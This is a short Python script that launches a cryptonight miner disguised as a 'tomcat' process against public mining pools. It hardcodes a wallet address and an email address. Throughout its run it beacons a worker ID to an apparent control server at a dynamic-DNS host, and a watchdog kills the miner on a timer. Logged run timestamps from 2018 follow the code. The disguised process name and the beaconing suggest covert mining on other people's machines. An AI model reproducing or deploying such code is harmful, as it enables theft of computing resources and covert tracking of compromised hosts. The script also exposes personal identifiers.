import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:05.336898
#2018-02-17 16:26:07.159898
#2018-02-17 18:13:01.875952
#2018-02-17 20:01:06.965807
#2018-02-17 21:49:07.012649
#2018-02-17 23:35:04.179659
#2018-02-18 01:24:04.966008
#2018-02-18 03:11:06.636195
#2018-02-18 05:01:01.692025
#2018-02-18 06:53:06.112346
#2018-02-18 08:40:07.284153
#2018-02-18 10:26:06.803599
#2018-02-18 12:12:03.669700
#2018-02-18 13:58:04.376973
#2018-02-18 15:48:01.527451
#2018-02-18 17:37:07.718127
#2018-02-18 19:25:05.862407
#2018-02-18 21:10:03.421721
#2018-02-18 22:57:04.025685
#2018-02-19 00:44:05.201387
#2018-02-19 02:31:02.242182
#2018-02-19 04:17:01.282290
#2018-02-19 06:01:04.577546
#2018-02-19 07:49:03.466650
#2018-02-19 09:39:01.998330
#2018-02-19 11:28:01.774614
#2018-02-19 13:14:08.680657
#2018-02-19 15:02:10.692964
#2018-02-19 16:50:07.742708
#2018-02-19 18:38:01.638703
#2018-02-19 20:23:02.156773
#2018-02-19 22:10:10.432654
#2018-02-19 23:55:06.344892
#2018-02-20 01:42:08.202752
#2018-02-20 03:30:07.207197
#2018-02-20 05:17:07.665791
#2018-02-20 07:02:07.841769
#2018-02-20 08:48:08.022869
#2018-02-20 10:32:07.814002
#2018-02-20 12:16:08.131471
#2018-02-20 14:03:01.619699
#2018-02-20 15:46:12.443747
#2018-02-20 17:33:02.066448
#2018-02-20 19:22:01.231828
#2018-02-20 21:09:08.428016
#2018-02-20 22:55:09.465406
#2018-02-21 00:39:04.522771
#2018-02-21 02:26:08.978911
#2018-02-21 04:12:02.206214
#2018-02-21 05:59:03.880792
#2018-02-21 07:47:04.954548
#2018-02-21 09:33:04.299397
#2018-02-21 11:21:07.057889
#2018-02-21 13:11:08.220938
#2018-02-21 14:57:08.524951
#2018-02-21 16:45:13.934143
#2018-02-21 18:36:01.906692
#2018-02-21 20:21:01.936965
#2018-02-21 22:09:05.692604
#2018-02-21 23:57:08.101434
#2018-02-22 01:46:06.410540
#2018-02-22 03:33:07.585414
#2018-02-22 05:21:03.784795
#2018-02-22 07:05:03.902743
#2018-02-22 08:51:02.071588
#2018-02-22 10:39:05.127979
#2018-02-22 12:25:11.498725
#2018-02-22 14:09:09.037231
#2018-02-22 15:57:14.601946
#2018-02-22 17:45:03.667783
#2018-02-22 19:31:04.858169
#2018-02-22 21:23:02.098974
#2018-02-22 23:07:08.344686
#2018-02-23 00:53:05.877133
#2018-02-23 02:40:01.582164
#2018-02-23 04:29:05.381872
#2018-02-23 06:16:07.341375
#2018-02-23 08:03:07.685418
#2018-02-23 10:18:08.537687
#2018-02-23 12:12:06.012096
#2018-02-23 14:01:07.402085
#2018-02-23 15:53:07.833969
#2018-02-23 17:38:09.461056
#2018-02-23 19:24:05.324705
#2018-02-23 21:09:07.886277
#2018-02-23 22:56:01.592418
#2018-02-24 00:33:06.809448
#2018-02-24 02:24:06.173576
#2018-02-24 04:13:05.847608
#2018-02-24 06:01:01.870651
#2018-02-24 07:49:01.686257
#2018-02-24 09:34:05.126056
#2018-02-24 11:28:03.842006
#2018-02-24 13:17:06.371803
#2018-02-24 15:08:02.209862
#2018-02-24 16:56:05.062178
#2018-02-24 18:45:08.252201
#2018-02-24 20:36:03.553024
#2018-02-24 22:41:05.454234
#2018-02-25 01:48:01.255493
#2018-02-25 05:12:06.021734
#2018-02-25 10:54:01.862858